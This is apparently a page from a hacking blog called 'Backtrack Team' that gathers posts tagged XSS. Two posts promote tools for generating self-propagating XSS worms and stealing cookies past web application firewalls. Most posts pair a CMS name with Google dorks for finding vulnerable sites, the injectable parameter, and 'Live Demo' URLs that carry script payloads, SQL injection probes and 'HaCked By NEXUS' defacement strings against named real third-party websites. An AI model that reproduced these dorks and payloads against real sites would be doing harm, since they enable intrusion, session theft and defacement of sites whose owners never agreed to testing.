Backtrack Team: Xss

Affichage des articles dont le libellé est Xss. Afficher tous les articles

xssless: An Automated XSS Payload Generator

Xssless is an automated XSS payload generator written in python.

Usage

Record request(s) with Burp proxy
Select request(s) you want to generate, then right click and select "Save items"
Use xssless to generate your payload: ./xssless.py burp_export_file
Pwn!

Features

Automated XSS payload generation from imported Burp proxy requests
Payloads are 100% asynchronous and won't freeze the user's browser
Payloads are optimized, but should be minimized by a third party tool
CSRF tokens can be easily extracted and set via the -p option
POST multipart is supported, along with XSS file uploading via the -f option
Payloads are dynamic and portable (due to relative URLs)
Self propagation is now supported - meaning you can set a POST value to the payload itself!
Crazy JavaScript worms with no hassle!

Installation

Download the latest xssless:

git clone https://github.com/mandatoryprogrammer/xssless

Run the script:
./xssless.py -h

Download and read more at

by Malik korrich ~ lundi 24 août 2015 0 commentaires

XSSYA - Cross Site Scripting Scanner & Vulnerability Confirmation

Cross-Site-Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

What is XSSYA?

When Web application Penetration Tester start to scan web site using vulnerability scanners it give him false positive vulnerabilities and that happen because a lot of scanners using the method of request and response the scanner execute the payload and if the response 200 then it's vulnerable in fact that is not enough to confirm the vulnerability and in this case the penetration tester need to confirm it manually Here XSSYA come to Confirm XSS -Cross Site Scripting Vulnerability without Using the Browser.

XSSYA How IT Works ?

XSSYA work by execute the payload encoded to bypass Web Application Firewall which is the first method request and response if it respond 200 it turn to Method 2 which search that payload decoded in web page HTML code if it confirmed get the last step which is execute document.cookie to get the cookie.

Features

* Support HTTPS
* After Confirmation (execute payload to get cookies)
* Can be run in (Windows - Linux)
* Identify 3 types of WAF (Mod_Security - WebKnight - F5 BIG IP)
*XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall)
* Support Saving The Web HTML Code Before Executing the Payload Viewing the Web HTML Code into the Screen or Terminal

Cross Site Scripting Scanner Video Tutorial

Download

by Malik korrich ~ samedi 10 janvier 2015 0 commentaires

[XSS] noname-media

Dork:

intext:"powered by www.noname-media.com" inurl:"/view.php?id="

Exploit:

/view.php?id=

Live Demo:

http://www.rws-e.de/php/galerie/view.php?id=4&next=1&categorie=3%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ dimanche 6 juillet 2014 0 commentaires

ProActive CMS - XSS

Dork:

intext:"Powered by Proactive CMS"

Exploit:

/admin.php?action=newuser (XSS)

Live Demo:

http://www.proactivecms.com/admin.php?action=newuser%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

Joomla Aclassif - XSS

Dork:

inurl:"index.php?option=com_aclassif"

Exploit:

/index.php/component/aclassif/?

Example & Live Demo:

http://www.thegreekstar.com/index.php/component/aclassif/?%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

Pro-Service - XSS Vulnerability

Dorks:

intext:"Pro-Service" inurl:"/resume_list.php?id="

intext:"Pro-Service"

Exploit:

/resume_list.php?id=

Live Demo:

http://www.staff.ge/resume_list.php?id=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ samedi 5 juillet 2014 0 commentaires

MyBB Kingchat - XSS

Dork:

inurl:/kingchat.php?

Exploit:

/kingchat.php?notic

Change that /... into this to see exploit:

/kingchat.php?chat=2&l=2

Then add your scripts...

Live Demo:

http://www.embargoedchat.co.uk/kingchat.php?chat=2&l=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

Pej Studio & Nissi Infotech & Plante Graffix - Cross Site Scripting (XSS)

Dork:

intext:"Created By Nissi Infotech"

Exploits:

http://target.com/name.php?id= [XSS & SQLI]

Live Demo:

http://www.jayapriya.com/realestate/projectdetail.php?id=42%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

Seventeen Design XSS & SQLI

Dork:

intext:"Producido por: Seventeen Design."

Exploits:

http://site.com/*.*id=

Live Demo:

SQLI + XSS:

http://www.murcian.com/aig/nota.php?id=9%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,69,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ vendredi 4 juillet 2014 0 commentaires

Espacio Ecuador XSS & SQLI

Dork:

intext:"developed by Espacio Ecuador"

Exploits:

http://site.com/*.*?id=

http://site.com/*.*?id= < XSS>

Live Demo:

SQLI:

http://www.galapagostraveline.com/deal.html?opc=31%27

XSS:

http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

Arwen Cross Site Scripting & SQL Injection

Dork:

intext:"website realizado por Arwen desarrollo web y diseño"

Exploits:

http://site.com/index.php?m=

http://site.com/index.php?mod= < SQLI>

http://site.com/index.php?m=

http://site.com/index.php?mod=

Live Demo:

SQLI:

http://www.raulmadinabeitia.com/grupos.php?mod=61&id=97%27

XSS:

http://www.raulmadinabeitia.com/grupos.php?mod=61&id=97%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

MD Webmarketing Cross Site Scripting / SQL Injection

Dork:

"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=

Exploits:

http://www.site-web.com/***.php?id= [SQL Injection]

http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]

Live Demo:

SQL Injection:

http://www.pierreadrileiloes.com.br/exibe.php?id=61712%27

XSS (with HTML scripts):

http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Ch1%3EHaCked%20By%20NEXUS%20!%3C/h1%3E

XSS (with JavaScript):

http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cimg%20src=x%20onerror=alert%28%22NEXUS%22%29;%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

milkshakedesign CMS - XSS Vulnerability

Dork:

intext:"Website by Milkshake Design" inurl:"/programmeview.php?pid="

Exploit:

programmeview.php?pid=

Example & Live Demo:

http://www.optimumtelevision.com/programmeview.php?pid=310%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29%3C/script%3E

NEXUS

by Malik korrich ~ jeudi 3 juillet 2014 0 commentaires

XSS Found By NEXUS !

I found all XSS in those sites :D

http://pastebin.com/fGSr5sn3

NEXUS

by Malik korrich ~ 0 commentaires

mc-creation CMS - XSS Vulnerability

Dorks:

intext:"web design solution" inurl:"product_view.php?pid="

intext:"web design solution"

Exploit:

"product_view.php?pid="

Examples & Live Demos:

Testing:

http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

String to char:

http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS

by Malik korrich ~ 0 commentaires

Morgane CMS - XSS Vulnerability

Dorks:

intext:"www.morgane.co.uk" inurl:"/main.php?sid="

intext:"www.morgane.co.uk" inurl:"/main.php?id="

Use string to char.. Or use numbers..

Example & Live Demo:

String to char mode:

http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Numbers mode (testing mode):

http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

* Can run XSS only on Firefox not Google Chrome :D

NEXUS

by Malik korrich ~ 0 commentaires

Kingcow CMS Cross Site Scripting

Dorks:

inurl:"search.php?for="

intext:"Powered by Central"

* for parameter in search.php is VULNERABLE to XSS..

Exploits:

">&search_submit=Search

Or if you can't use normal script.. Change it from string to character:

">&search_submit=Search

These char "String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33)" is "HaCked By NEXUS !" using Hack Bar of Firefox...

If you dont have that "Hack Bar" .. Download it from :

https://addons.mozilla.org/en-US/firefox/addon/hackbar/

Live Demo:

http://hdmixtapes.com/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E&search_submit=Search

http://artnews.org/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083%29%29;%3C/script%3E&search_submit=Search

NEXUS

by Malik korrich ~ mardi 1 juillet 2014 0 commentaires

Cm3 CMS Cross Site Scripting (XSS)

Dork:

intext:"Powered by cm3"

* Keywords & strSearchPhrase Parametrs In Search.asp Are Vulnerable to XSS..

Exploits:

http://www.NEXUS.com/forums/search.asp?strSearchPhrase=">&ContainerID=&forumsearchoption=topics

http://www.NEXUS,com/search.asp?keywords=">&SearchType=And&;CurrentPage=1

http://www.NEXUS.com/search.asp?CurrentPage=1&sitekeywords">&;SearchType=Default

http://www.NEXUS.com/search.asp?SearchType=Keywords&Keywords=">&x=0&y=0

Live Demo:

http://www.ergonomics.org.au/forums/search.asp?strSearchPhrase=%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29;%3C/script%3E&ContainerID=&forumsearchoption=topics